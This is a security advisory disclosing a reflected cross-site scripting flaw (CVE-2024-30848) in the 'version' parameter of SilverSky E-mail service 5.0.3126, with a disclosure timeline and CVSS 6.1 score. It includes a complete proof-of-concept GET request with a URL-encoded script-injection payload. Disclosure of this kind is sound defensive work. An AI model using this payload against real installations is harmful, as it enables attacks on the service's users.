An Cross-site scripting (XSS) vulnerability was discovered in SilverSky E-mail service version 5.0.3126. This allows remote attackers to inject arbitrary web scripts or HTML via the version parameter.
Cross Site Scripting (XSS)
SilverSky
Silversky - Email Service - 5.0.3126
Version parameter
Remote
- 17 March 2024 - Found the issue
- 18 March 2024 - Contacted Silversky ( Mail, Linked-in, Twitter )
- 18 March 2024 - MITRE CVE request
- 04 April 2024 - MITRE Reserved CVE-2024-30848
- 07 May 2024 - Reminder Silversky ( Mail, Linked-in, Twitter )
- 18 June 2024 - Disclosed issue
SilverSky E-mail service has a hidden parameter that can be exploited. The version parameter is vulerable to XSS.
GET /tpl/Door/Login?Domain=&version=1--%3E%3Cbody%3E%3Ch1%3EPoC%20by%20Excis3%3C/h1%3E%3Cscript%3Eprint(%271%27)%3C/script%3E%3C/body%3E%3C/html%3E%3C!-- HTTP/1.1
Host: <HOST>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=1
Te: trailers
Connection: keep-alive
| Vector | Value |
|---|---|
| Attack Vector (AV) | Network |
| Attack Complexity (AC) | Low |
| Privileges Required (PR) | None |
| User Interaction (UI) | Required |
| Scope (S) | Changed |
| Confidentiality (C) | Low |
| Integrity (I) | Low |
| Availability (A) | None |
Score: Medium 6.1